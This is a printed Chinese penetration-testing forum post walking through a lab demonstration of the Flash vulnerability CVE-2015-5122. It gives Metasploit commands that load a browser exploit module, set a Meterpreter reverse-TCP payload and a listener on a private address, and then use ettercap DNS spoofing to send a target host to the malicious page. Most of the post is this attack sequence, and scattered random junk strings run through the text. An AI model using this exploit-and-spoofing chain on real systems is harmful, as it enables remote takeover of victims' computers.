中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin    时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

. t; i; |. b2 I5 b: c0 b 二、cve2015-5122漏洞实例演示虚拟机 # v' l! m5 F5 ]2 a$ ?2 m

; K2 J2 r0 ?# W. J V y

" o$ V1 F |' h- l# T/ b/ W   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: : y1 C! L7 b( T6 [

! y3 W }0 M6 Q

4 G- M& `5 P* N" ` search cve-2015-5122如图: % A% ?* c( P6 h5 u! H0 J

6 T6 F8 D- {5 w9 [1 n; @

- [$ w$ K5 t- i4 J0 a   6 `6 ~2 l% d; t2 N3 P) n

6 V& @5 T3 V6 K5 g

& k5 y; P/ V! H# Y7 E 下面我们敲如下命令: / Q9 @6 @' t- M/ C/ x

4 l9 V: p/ q/ c1 R, u. Q7 [4 c

[$ \ i$ r' g7 s5 z use exploit/multi/browser/adobe_flash_opaque_background_uaf 2 y) D, Z2 k1 `9 r- P( ~' ~5 [, g

# t, ?% ?9 U% P- E

$ z# b& q$ W: A* F0 } set PAYLOAD windows/meterpreter/reverse_tcp $ U" b, V! C- w: {8 a$ N

# {% ]6 _9 ^. Y* w

" w! Q+ E! L$ [1 W# V$ c5 n set LHOST 192.168.0.109 & @1 ?: j, J0 O: `, |6 o; K* e/ F

; s$ u" U p9 g

( E' I" P; R; t: Q. C0 | set URIPATH /                        /*根目录*/ 9 R$ g" Y. e( B; f1 t

. s+ l! Y! p4 h) j) P) c- A

4 j4 r* Z8 J" x$ \ set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 1 r' G- J2 k7 v' G2 C/ m

7 `! _- Y5 P6 [8 r1 T0 F

1 B8 e5 R1 f( V7 c( U2 Q, X set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # {9 p. o, v( ?8 o# [8 p( T

# @+ ] m+ ?! a# R8 `+ v

2 I8 y8 i- F& G- ~3 \" o# b 然后show options如图: * t+ n. x+ \5 w; h* T7 {, }: i

* B1 A, y& ^) a% N4 U

( j3 M9 [: I& z w1 e   / x- K. D6 h' d" X& ?. r1 I! X3 f

) U8 s, c4 K% u, i2 b0 `4 c

; u7 y$ M. W* i! l1 ~" e0 V 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
8 _, o3 n4 W) R4 \1 c/ R1 c& X
4 e- R7 @7 n- ~3 p) k4 [1 l# L9 `

( W5 u, v, c: C; ^

! w9 }8 G/ H, R9 Y$ |2 x 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 * I9 v( E, m: t8 t. o. H

3 j& C2 }' l- ]3 {1 O

7 c2 \3 u- s8 r6 ~ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 J" E2 a6 N0 r% _

, j- N3 w) b" W4 b

$ S$ P" [# r! k$ N; W2 K   1 D7 E6 U1 E+ x8 d# I: Y6 ^

& Q5 [8 R# l8 s9 ^2 L8 M3 I0 u

* l! b4 f: j, y5 r& d/ j: w 成功了,这时候我们断开ettercap,如图: 0 B8 X& Y# Y; e' c1 M& x

3 E) [! A6 M) I, u$ m, O8 d

5 F" S3 b j. N1 C9 b   : _) d( C/ @, _0 a; q$ u5 _

7 m5 j6 y$ G& @+ h! Y9 V

4 K, B n$ y4 f Screenshot如图: 4 Z# i2 Q; X8 z' S' f

9 D8 T5 F5 X- f2 _! T8 S

1 i0 g$ b/ \" v/ [1 b' s   ; p# X" P* n$ X9 B

- m; n1 k3 _, J% ~

. ~' p$ p( h3 c9 w5 d7 ~4 Z 9 x- d* J" W8 F0 Z- [8 O






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2